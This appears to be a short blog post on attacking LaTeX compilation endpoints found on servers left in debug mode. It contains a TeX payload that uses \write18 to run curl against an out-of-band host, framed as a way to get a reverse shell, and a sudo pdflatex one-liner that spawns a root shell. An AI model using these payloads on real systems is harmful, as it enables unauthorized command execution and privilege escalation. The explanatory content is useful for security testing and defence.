Who has never analyzed a website and ended up causing an error and discovered that the server was in debug mode and therefore revealing environment variables (like other URLs, database connection strings and even credentials) and routes to API endpoints and their respective Swagger UI documentation? Cool, and who has ever come across something called "LaTeX Compiler API 1.0" among those endpoints?
LaTeX is a markup language for composing and styling documents in a descriptive manner based on tags. Systems that have capabilities for processing other file formats such as PDF or DVI usually integrate a LaTeX distribution (like pdflatex).
The interesting thing is that in addition to describing documents, it is possible to create functional programs and even execute shell commands. In the case of the Compiler API, the /compile route normally accepts TeX files via POST request.
It may be possible to obtain a reverse shell by sending a payload like the one below:
\usepackage[utf8]{inputenc}
\immediate\write18{curl redacted.oast.fun}
It is worth noting that execution will be triggered if the -shell-escape flag is activated. Once inside the server, you may be able to escalate privileges if pdflatex has SUDO permissions:
sudo pdflatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
Let's face it, LaTeX doesn't have a very pleasant syntax, but the next time you encounter it in a user input field, you already know what to do, right?
Top comments (0)